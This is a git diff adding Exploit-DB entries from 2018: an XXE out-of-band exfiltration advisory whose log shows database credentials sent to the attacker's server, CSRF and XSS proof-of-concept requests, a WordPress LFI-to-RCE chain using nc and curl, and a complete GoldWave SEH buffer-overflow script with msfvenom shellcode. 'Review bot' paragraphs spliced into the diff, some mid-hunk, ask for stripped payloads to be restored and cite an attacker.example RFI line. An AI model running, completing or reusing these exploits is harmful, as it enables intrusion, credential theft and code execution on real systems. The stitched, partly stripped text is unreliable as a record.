a/exploits/linux/webapps/44430.txt b/exploits/linux/webapps/44430.txt new file mode 100644 index 000000000..b77b59c8b --- /dev/null +++ b/exploits/linux/webapps/44430.txt 
@@ -0,0 +1,62 @@ +#Vendor: KYOCERA Corporation +#Product https://global.kyocera.com +#Affected version: 3.4.0906 +# +#Summary: KYOCERA Net Admin is Kyocera's unified +#device management software that uses a web-based +#platform to give network administrators easy and +#uncomplicated control to handle a fleet for up to +#10,000 devices. Tasks that used to require multiple +#programs or walking to each printer can now be +#accomplished in a single, fast and modern environment. +# +#Desc: KYOCERA Multi-Set Template Editor (part of Net +#Admin) suffers from an unauthenticated XML External Entity +#(XXE) injection vulnerability using the DTD parameter +#entities technique resulting in disclosure and retrieval +#of arbitrary data from the affected node via out-of-band +#(OOB) channel attack. The vulnerability is triggered when +#input passed to the Multi-Set Template Editor (kmmted.exe) +#called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll +#is not sanitized while parsing a 5.x Multi-Set template XML +#file. +# +#Tested on: Microsoft Windows 7 Professional SP1 (EN) +# Apache Tomcat/8.5.15 +# +# +#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience +# +# +# +#Advisory ID: ZSL-2018-5459 +#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php +# +# +#28.03.2018 +# +#— +# +# +#Malicious.xml: + + + +%remote; +%root; +%oob;]> + + +Attacker's xxe.xml: + + + "> + + +Data retrieval: + +lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777 +Serving HTTP on 0.0.0.0 port 7777 ... 
+192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 - +192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 - \ No newline at end of file diff --git a/exploits/linux/webapps/44431.txt b/exploits/linux/webapps/44431.txt new file mode 100644 index 000000000..7f85f7847 --- /dev/null +++ b/exploits/linux/webapps/44431.txt @@ -0,0 +1,83 @@ +#Vendor: KYOCERA Corporation +#Product https://global.kyocera.com +#Affected version: 3.4.0906 +# +#Summary: KYOCERA Net Admin is Kyocera's unified +#device management software that uses a web-based +#platform to give network administrators easy and +#uncomplicated control to handle a fleet for up to +#10,000 devices. Tasks that used to require multiple +#programs or walking to each printer can now be +#accomplished in a single, fast and modern environment. +# +#Desc: The application interface allows users to perform +#certain actions via HTTP requests without performing +#any validity checks to verify the requests. This can +#be exploited to perform certain actions with administrative +#privileges if a logged-in user visits a malicious web +#site. +# +#Tested on: Microsoft Windows 7 Professional SP1 (EN) +#Apache Tomcat/8.5.15 +# +# +#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +#@zeroscience +# +# +#Advisory ID: ZSL-2018-5458 +#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php + + + +KYOCERA Net Admin 3.4 CSRF Add Admin Exploit + + + + + +
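Review bot: The Malicious.xml and xxe.xml blocks have lost their DOCTYPE and ENTITY declarations in this commit — only `%remote; %root; %oob;]>` and `">` survive — so the PoC cannot be reproduced from the advisory as written. The parameter-entity chain (the entity that fetches xxe.xml from the attacker host, the one that reads the local file, and the OOB entity that sends its contents to port 7777) should be restored in full. It would also help to state the mitigation, e.g. `# Fix: disable DTD processing / external entity resolution in the XML parser used by kmmted.exe`, and to point out that the captured request exfiltrates database credentials (`db_user=postgres`, `db_password=ENC(...)`), which is what sets the severity of the finding.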
+ + + + + + + + + + + + + + + + + +
+ + +
+ + + + +
+ + + + + + + + \ No newline at end of file diff --git a/exploits/multiple/dos/44427.txt b/exploits/multiple/dos/44427.txt new file mode 100644 index 000000000..ea0a6bb7f --- /dev/null +++ b/exploits/multiple/dos/44427.txt @@ -0,0 +1,16 @@ +When a WebAssembly binary is parsed in ModuleParser::parse, it is expected to contain certain sections in a certain order, but can also contain custom sections that can appear anywhere in the binary. The ordering check validateOrder() does not adequately check that sections are in the correct order when a binary contains custom sections. + +static inline bool validateOrder(Section previous, Section next) +{ + if (previous == Section::Custom) + return true; + return static_cast(previous) < static_cast(next); +} + +If the previous section was a custom section, the check always returns true, even if the section is otherwise out of order. This means any number of sections can be parsed from a binary, any number of times in any order. This leads to a number of possible overflows and type confusion bugs, as parsing assumes most sections are unique and in the right order. + +The attached html file causes a crash in Safari, the wasm file is attached as well. This particular use of the bug causes an overflow in the function vector. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44427.zip \ No newline at end of file diff --git a/exploits/php/webapps/44418.txt b/exploits/php/webapps/44418.txt new file mode 100644 index 000000000..5ae8edce3 --- /dev/null +++ b/exploits/php/webapps/44418.txt 
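Review bot: The CSRF proof-of-concept form has been reduced to its title, `KYOCERA Net Admin 3.4 CSRF Add Admin Exploit`, with no target action URL and no input names visible in the hunk, so a reader cannot validate the report or reproduce the admin-creation request. The form body (the user-creation endpoint and the parameters that assign the administrator role) needs to be restored. A one-line remediation note would also help, for example `# Fix: require a per-session anti-CSRF token on state-changing requests and mark the session cookie SameSite`.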
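Review bot: The quoted `validateOrder` excerpt has lost its template argument — `static_cast(previous) < static_cast(next)` is not valid C++ and presumably read something like `static_cast<uint8_t>(previous) < static_cast<uint8_t>(next)` before the HTML was stripped — so it should be restored from the WebKit source. The write-up would also be clearer if it sketched the intended fix: rather than returning true whenever `previous` is Custom, the parser should keep comparing against the last non-custom section, e.g. by not advancing `previous` when a custom section is consumed; that is my reading of the bug, not a statement of the upstream patch. A fixed-version or bug-tracker reference is missing as well.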
@@ -0,0 +1,64 @@ +####################################### +# Exploit Title: WolfCMS 0.8.3.1 Cross Site Request Forgery +# Google Dork: N/A +# Date: 04-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni# +####################################### +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.wolfcms.org +# Software Link: +https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip +# Affected Version: 0.8.3.1 +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : CVE-2018-8814 +# +# 1. Vendor Description: +# +# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended +CMS. Uses MySQL, SQLite or (from 0.7) +# PostgreSQL for db. Simple drag & drop page hierarchy. Open source, +licensed under GPLv3. +# +# 2. Technical Description: +# +# Cross-site request forgery (CSRF) vulnerability in WolfCMS before 0.8.3.1 +allows remote attackers to hijack the +# authentication of users for requests that modify +plugin/[pluginname]/settings and can uninstall plugins by sending +# malicious request. +# +# 3. Proof Of Concept: +# +# Send below request to logged in user to change the plugin settings. +# +# +# +#
+# +# +# +#
+# +# +# +# +# Share the below URL to uninstall any plugin remotely. +# +# http://[url]/wolfcms/?/admin/setting/uninstall_plugin/[pluginname] +# +# +# 4. Solution: +# +# Upgrade to latest release. +# http://www.wolfcms.org/blog.html +# +# 5. Reference: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8814 +# https://github.com/wolfcms/wolfcms/issues/671 +##################################### \ No newline at end of file diff --git a/exploits/php/webapps/44419.txt b/exploits/php/webapps/44419.txt new file mode 100644 index 000000000..b9e0d92bc --- /dev/null +++ b/exploits/php/webapps/44419.txt @@ -0,0 +1,25 @@ +# Exploit Title: [Cobub Razor 0.7.2 Add New Superuser User] +# Date: [2018-03-07] +# Exploit Author: [ppb(ppb@5ecurity.cn)] +# Vendor Homepage: [https://github.com/cobub/razor/] +# Software Link: [https://github.com/cobub/razor/] +# Version: [0.72] +# CVE : [CVE-2018-7745] + +There is a vulnerability that can add an admnistrator user without login. +update the url and save to html ,then open it. + + + + + +
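Review bot: The version statements contradict each other: the header says `Affected Version: 0.8.3.1` while the Technical Description says `WolfCMS before 0.8.3.1`, and the Solution then says "Upgrade to latest release", leaving a reader unable to tell whether 0.8.3.1 is vulnerable or fixed. One of the two should be corrected to match the CVE record and the Solution should name the fixed version explicitly. The PoC form has also been reduced to bare `#` lines with no action URL or field names, so the settings-change request needs restoring; the uninstall URL `/?/admin/setting/uninstall_plugin/[pluginname]` is the only reproducible part left.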
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/44420.txt b/exploits/php/webapps/44420.txt new file mode 100644 index 000000000..05725465a --- /dev/null +++ b/exploits/php/webapps/44420.txt @@ -0,0 +1,16 @@ +# Exploit Title: MyBB Recent threads +# Date: 4th April 2018 +# Exploit Author: Perileos +# Software Link: https://community.mybb.com/mods.php?action=view&pid=191 +# Version: 17.0 +# Tested on: Windows 10 + +1. Description: +This plugin shows recent threads in the side bar on your MyBB forum. + +2. Proof of concept: + +Persistent XSS +- Create a thread with the following subject
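Review bot: The HTML form that performs the add-superuser request has been stripped from the PoC, leaving only "update the url and save to html, then open it" with no endpoint, method or parameters, so the report is not verifiable as committed. The form (target URL, field names and the value that marks the account as superuser) should be restored, and the version field `[0.72]` should match the title's `0.7.2`. Since the description says no login is required, the note should also state whether this is an unauthenticated user-creation endpoint or a CSRF against a logged-in administrator, because the fix differs between the two.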

"> +- Navigate to the index to see a board wide persistent XSS alert. \ No newline at end of file diff --git a/exploits/php/webapps/44421.txt b/exploits/php/webapps/44421.txt new file mode 100644 index 000000000..3767ef6b1 --- /dev/null +++ b/exploits/php/webapps/44421.txt @@ -0,0 +1,42 @@ +####################################### +# Exploit Title: WolfCMS 0.8.3.1 Open Redirection Vulnerability +# Google Dork: N/A +# Date: 04-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni# +####################################### +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.wolfcms.org +# Software Link: https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip +# Affected Version: 0.8.3.1 +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : CVE-2018-8813 +# +# 1. Vendor Description: +# +# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended CMS. Uses MySQL, SQLite or (from 0.7) +# PostgreSQL for db. Simple drag & drop page hierarchy. Open source, licensed under GPLv3. +# +# 2. Technical Description: +# +# Open redirect vulnerability in the login[redirect] parameter login +functionality in WolfCMS before 0.8.3.1 allows +# remote attackers to redirect users to arbitrary web sites and conduct +phishing attacks via a malformed URL. +# +# 3. Proof Of Concept: +# +# Navigate to http://[URL]/wolfcms/?/admin/login +# Enter the credentials and replace login[redirect] to any url. +# You can see the unvalidated redirect. +# +# 4. Solution: +# +# Upgrade to latest release. +# http://www.wolfcms.org/blog.html +# +# 5. Reference: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8813 +# https://github.com/wolfcms/wolfcms/issues/670 +##################################### \ No newline at end of file diff --git a/exploits/php/webapps/44424.txt b/exploits/php/webapps/44424.txt new file mode 100644 index 000000000..3216d8843 --- /dev/null 
+++ b/exploits/php/webapps/44424.txt @@ -0,0 +1,66 @@ +# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting +# Google Dork: intitle:"Proberv0." | inurl:/proberv.php +# Date: 23/03/2018 +# Exploit Author: ManhNho +# Vendor Homepage: http://www.yahei.net/ +# Software Link: www.yahei.net/tz/tz_e.zip +# Version: 0.4.7 +# CVE: CVE-2018-9238 +# Tested on: Windows 10 / Kali Linux +# Category: Webapps + + +#1. Description +----------------------------------------------------- +proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter. + + +#2. Proof of Concept +----------------------------------------------------- +Request: + +POST /proberv.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 +Firefox/59.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: /proberv.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 186 +Connection: close +Upgrade-Insecure-Requests: 1 + +pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd= + +----------------------------------------------------- +Response: + +HTTP/1.1 200 OK +Server: nginx +Date: Thu, 22 Mar 2018 16:59:57 GMT +Content-Type: text/html; charset=utf-8 +Connection: close +Vary: Accept-Encoding +Content-Length: 30461 +... + + + +Enter the function you want to test: + + + + + + +Test results +support the position: 错误') + + +#3. References +----------------------------------------------------- +https://pastebin.com/ia7U4vi9 +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238 \ No newline at end of file diff --git a/exploits/php/webapps/44425.txt b/exploits/php/webapps/44425.txt new file mode 100644 index 000000000..87456ce8a --- /dev/null +++ b/exploits/php/webapps/44425.txt 
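Review bot: The response excerpt ends with `support the position: 错误')`, which suggests `funName` is reflected inside a JavaScript string rather than plain HTML, and the payload `')</script><script>alert("1");</script>` indeed closes that string first; the description "has XSS via the funName parameter" should say so, since `htmlspecialchars` alone would not fix a JS-string context. The PoC request has an empty `Host:` header and the surrounding script tags have been stripped from the response, so the injection context is not fully reproducible as printed. A remediation line, e.g. `encode funName with json_encode() before embedding it in script and with htmlspecialchars() for HTML output`, would complete the report.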
@@ -0,0 +1,42 @@ +# Exploit Title: Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE +# Date: 2018-04-08 +# Exploit Author: Graeme Robinson +# Contact: @Grasec +# Vendor Homepage: http://simple-fields.com +# Software Link: https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip +# Version: 0.2 - 0.3.5 +# Tested on: Ubuntu 16.04.4 + PHP 5.3.0 +# Category: webapps + + +1. Description +Versions 0.2 to 0.3.5 of the Simple Fields WordPress plugin are vulnerable to local file inclusion if running on PHP <5.3.4. This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini. + +PHP <5.3.4 is required because the exploit relies on the ability to inject a null byte to terminate a string before the script expects it to be and this was fixed in PHP 5.3.4 + +The vulnerability was fixed (commented out) in version 0.3.6 on 2011-02-03. Simple Fields is no longer actively developed, since 2016-02-27 (http://simple-fields.com/2016/bye-bye-simple-fields/) + +The vulnerable line of code in simple_fields.php is: + require( $_GET["wp_abspath"] . './wp-blog-header.php' ); + + +2. Proof of concept +LFI: + http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 + +RCE: + $ echo ""|nc host 80 + $ curl "http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=../../../../../logs/access_log%00&cmd=id" + + +3. Solutions: +* Upgrade PHP to 5.3.4+ +* Update Simple Fields to 0.3.6+ +* Stop using Simple Fields because it is no longer supported + + +4. Relevant Links: +* http://simple-fields.com +* https://wordpress.org/plugins/simple-fields/ +* https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip +* https://github.com/bonny/WordPress-Simple-Fields \ No newline at end of file diff --git a/exploits/php/webapps/44432.txt b/exploits/php/webapps/44432.txt new file mode 100644 index 000000000..9cb06725e --- /dev/null 
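Review bot: The claim "PHP <5.3.4 is required" is too strong for the RFI path: with `allow_url_include` on, `wp_abspath=http://attacker.example/` makes `require()` fetch `http://attacker.example/./wp-blog-header.php`, a file the attacker controls, so no null byte is needed there; the description should separate the LFI precondition (null byte, PHP < 5.3.4) from the RFI one (allow_url_include, any version). The RCE step `echo ""|nc host 80` has lost the payload that poisons the access log — presumably a PHP tag executing `$_GET['cmd']` — and should be restored. The log path `../../../../../logs/access_log` is installation-specific and deserves a caveat.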
+++ b/exploits/php/webapps/44432.txt @@ -0,0 +1,47 @@ +# Exploit Title: Plugin Buddypress Xprofile Custom Fields Type 2.6.3 RCE – Unlink +# Date: 08/04/2018 +# Exploit Author: Lenon Leite +# Vendor Homepage: +# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/ +# Software Link: +# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 2.6.3 +# Tested on: Ubuntu 16.1 +# +#Article: +#http://lenonleite.com.br/publish-exploits/plugin-buddypress-xprofile-custom-fields-type-2-6-3-rce-unlink/ +# +#Video: +#https://www.youtube.com/watch?v=By7kT7UbHVk +# + +1 - Description + - Type user access: any user registered used in BuddyPress. + - $_POST[ 'field_' . $field_id . '_hiddenfile' ] is not escaped. + - $_POST[ 'field_' . $field_id . '_deleteimg' ] is not escaped. + + +2. Proof of Concept + +Login as regular user. + +1- Log in with BuddyPress User + +2 - Access Edit Profile: + +http://target/members/admin/profile/edit/ + +3 - Register data with image: + + 4 +- Change parameter to delete image in html and save profile: + + + +#-- +#*Atenciosamente* +# +#*Lenon Leite* \ No newline at end of file diff --git a/exploits/php/webapps/44433.txt b/exploits/php/webapps/44433.txt new file mode 100644 index 000000000..d31bc05b2 --- /dev/null +++ b/exploits/php/webapps/44433.txt @@ -0,0 +1,35 @@ +# Exploit Title: Plugin Woocommerce CSV importer 3.3.6 – RCE – Unlink +# Date: 08/04/2018 +# Exploit Author: Lenon Leite +# Vendor Homepage: *https://wordpress.org/plugins/woocommerce-csvimport/ +# Software Link: *https://wordpress.org/plugins/woocommerce-csvimport/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 3.3.6 +# Tested on: Ubuntu 16.1 +# + +1 - Description + + - Type user access: any user registered. + - $_POST['filename'] is not escaped. + +2. Proof of Concept + +
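Review bot: The title says `RCE – Unlink`, but the description only shows two unescaped POST parameters (`field_<id>_hiddenfile` and `field_<id>_deleteimg`) reaching a file deletion, i.e. arbitrary file unlink by any registered BuddyPress user; the heading should read `Arbitrary File Deletion` unless the linked article demonstrates code execution. Deleting `wp-config.php` can lead to a reinstall-based takeover on WordPress, but that is an inference and should be stated as such rather than implied by the title. Steps 3 and 4 of the PoC have lost their form content, so the parameter values to send are not reproducible here.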

+ + +
+ + + - Date Discovery : *11/23/2017* + - Date Vendor Contact : *12/29/2017* + - Date Publish : 08/04/2018 + - Date Resolution : + + +#*Atenciosamente* +# +#*Lenon Leite* \ No newline at end of file diff --git a/exploits/php/webapps/44434.txt b/exploits/php/webapps/44434.txt new file mode 100644 index 000000000..eef91dbb6 --- /dev/null +++ b/exploits/php/webapps/44434.txt @@ -0,0 +1,65 @@ +# Exploit Title: iScripts SonicBB 1.0 - Reflected Cross-Site Scripting +# Date: 02/04/2018 +# Exploit Author: ManhNho +# Vendor Homepage: https://www.iscripts.com +# Demo Page: https://www.demo.iscripts.com/sonicbb/demo/ +# Version: 1.0 +# Tested on: Windows 10 +# Category: Webapps +# CVE: CVE-2018-9235 + +1. Description +==================== +iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query +parameter to search.php + +2. PoC +==================== +Request: + +GET +/sonicbb/demo/search.php?query=%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E +HTTP/1.1 +Host: www.demo.iscripts.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) +Gecko/20100101 Firefox/59.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: __utma=227100805.298811387.1522637403.1522637403.1522637403.1; +__utmb=227100805; __utmc=227100805; +__utmz=227100805.1522637403.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); +PHPSESSID=grh7l3amrvhoapig8ll268l9o4; +messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; hs-messages-is-open=false +Connection: close +Upgrade-Insecure-Requests: 1 + +Response: + +HTTP/1.1 200 OK +Date: Mon, 02 Apr 2018 02:58:48 GMT +Server: Apache +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Connection: close +Content-Type: text/html +Content-Length: 3619 +... + + iScripts Forum -> +">Search + +
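Review bot: Same labelling problem as the Buddypress entry: `$_POST['filename'] is not escaped` plus "Unlink" describes an arbitrary file deletion by any registered user, not remote code execution, so the title should be corrected. The PoC form between `2. Proof of Concept` and the disclosure dates has been stripped entirely — no action URL and no `filename` value — and `Date Resolution` is blank, so it is unclear whether 3.3.6 is still the current version. Restoring the form and adding a fix note such as `validate filename against the import directory with realpath() and reject path separators` would make this actionable.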
+ + +
+ + +... + +3. References +==================== +https://pastebin.com/caQW37fY +https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9235 \ No newline at end of file diff --git a/exploits/php/webapps/44435.txt b/exploits/php/webapps/44435.txt new file mode 100644 index 000000000..e0040a5cb --- /dev/null +++ b/exploits/php/webapps/44435.txt @@ -0,0 +1,34 @@ +# Exploit Title: Plugin Google Drive for WordPress 2.2 – RCE – Unlik +# Date: 08/04/2018 +# Exploit Author: Lenon Leite +# Vendor Homepage: *https://wordpress.org/plugins/wp-google-drive/ +# Software Link: *https://wordpress.org/plugins/wp-google-drive/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 2.2 +# Tested on: Ubuntu 16.1 + +1 - Description + + + - Type user access: Don't need of login . + - $_POST[‘file_name’] is not escaped. + +2. Proof of Concept + +1 - Send data form: + +
+ + + + +
+ + +# - Date Discovery : *11/25/2017* +# - Date Vendor Contact : *12/26/2017* +# - Date Publish : 08/04/2018 +# - Date Resolution : \ No newline at end of file diff --git a/exploits/windows/local/44423.py b/exploits/windows/local/44423.py new file mode 100755 index 000000000..38950e686 --- /dev/null +++ b/exploits/windows/local/44423.py 
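Review bot: The title has a typo, `Unlik` for `Unlink`, and like the other two unlink reports it is labelled RCE although the only defect described is an unescaped `$_POST['file_name']` passed to a delete operation; since the description says no login is needed, `Unauthenticated Arbitrary File Deletion` is the accurate and still-serious label. The form under `1 - Send data form:` has been stripped, so the target endpoint (admin-ajax action or plugin script) and the parameter value are missing and should be restored. The blank `Date Resolution` should be filled in or marked `unfixed at publication`.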
@@ -0,0 +1,68 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)
+# Date: 04-05-2018
+# Vulnerable Software: GoldWave 5.70
+# Vendor Homepage: https://www.goldwave.com/
+# Version: 5.70
+# Software Link: http://goldwave.com//downloads/gwave570.exe
+# Tested Windows 7 SP1 x86
+#
+#
+# PoC
+# 1. generate goldwave570.txt, copy contents to clipboard
+# 2. open gold wave app
+# 3. select File, Open URL...
+# 4. paste contents from clipboard after 'http://'
+# 5. select OK
+# 6. pop calc
+#
+
+filename="goldwave570.txt"
+
+junk = "\x71"*1019
+
+#popad
+nseh = "\x61\x62"
+
+#0x006d000f : pop ecx # pop ebp # ret | startnull,unicode,ascii {PAGE_EXECUTE_READ} [GoldWave.exe]
+seh = "\x0f\x6d"
+
+valign = (
+"\x53" #push ebx
+"\x47" #align
+"\x58" #pop eax
+"\x47" #align
+"\x05\x16\x11" #add eax,600
+"\x47" #align
+"\x2d\x13\x11" #sub eax,300
+"\x47" #align
+"\x50" #push eax
+"\x47" #align
+"\xc3" #retn
+)
+
+#nops to shellcode
+nops = "\x71" * 365
+
+#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
+#Payload size: 517 bytes
+calc = (
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AA"
+"PAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIXTBKPM0M0S0DIK501I0C44"
+"K0PP0DKPRLLTKQBMDTKBRO8LOFWOZMV01KOFLOLS13LLBNLO0WQXOLMKQI7K2KB0RQGTKPRN0DK0J"
+"OL4K0LN1CHISOXKQXQ214K0YMPKQJ3DK0IN8K3NZOYTKNT4KM1YFNQKO6L91XOLMM1WW08IP45ZVK"
+"S3MZXOKSMMTRUK4B8TKPXO4M1YCBFDKLLPKDKR8MLM1YC4KKTTKM18PU9PDO4MT1K1KQQR91J0QKO"
+"IP1O1O1J4KN2ZK4MQMRJM14MSUVRM0M0M0PP2HNQTKROSWKO8UWKZPH55R1FQX6FF5WMEMKOXUOLL"
+"F3LKZE0KKYPRUM5GKOWMCCBRO2JM023KOYE1S1QRLBCNNRERX1UM0AA")
+
+fill = "\x71"* 5000
+
+buffer = junk + nseh + seh + valign + nops + calc + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8d3edd7a2..b15603e15 100644
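Review bot: The `valign` comments `#add eax,600` and `#sub eax,300` do not describe the encoded instructions: after the Unicode expansion the exploit relies on, `\x05\x16\x11` becomes `add eax, 0x11001600` and `\x2d\x13\x11` becomes `sub eax, 0x11001300`, a net `eax += 0x300` — that is my reading of the bytes, so confirm against a disassembly — and the comments should say so, e.g. `#add eax,0x11001600 (unicode-expanded)` / `#sub eax,0x11001300 -> net +0x300`. The file write at the end should use a context manager and binary mode, `with open(filename, 'wb') as textfile: textfile.write(buffer)`, so the bytes reach the file unchanged regardless of platform newline translation (the buffer happens to contain no `\x0a`, which is why text mode works today; the str literals assume Python 2). The `seh` comment could also state explicitly that `\x0f\x6d` reaches `0x006d000f` only through the null-inserting Unicode expansion, which is the non-obvious part for readers.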
--- a/files_exploits.csv +++ b/files_exploits.csv @@ -5923,6 +5923,8 @@ id,file,description,date,author,type,platform,port 44397,exploits/windows/dos/44397.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy (Incomplete Fix) (2)",2018-04-03,"Google Security Research",dos,windows, 44402,exploits/windows/dos/44402.txt,"Microsoft Windows Defender - 'mpengine.dll' Memory Corruption",2018-04-05,"Google Security Research",dos,windows, 44404,exploits/windows/dos/44404.html,"Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods",2018-04-05,"Google Security Research",dos,windows, +44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple, +44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -9635,6 +9637,9 @@ id,file,description,date,author,type,platform,port 44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows, 44410,exploits/windows/local/44410.txt,"Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass",2018-04-06,hyp3rlinx,local,windows, 44411,exploits/windows/local/44411.txt,"Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption",2018-04-06,hyp3rlinx,local,windows, +44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java, +44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows, +44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -16374,6 +16379,7 @@ id,file,description,date,author,type,platform,port 44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows, 44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, +44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux, 44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows, 44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux, 44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, 
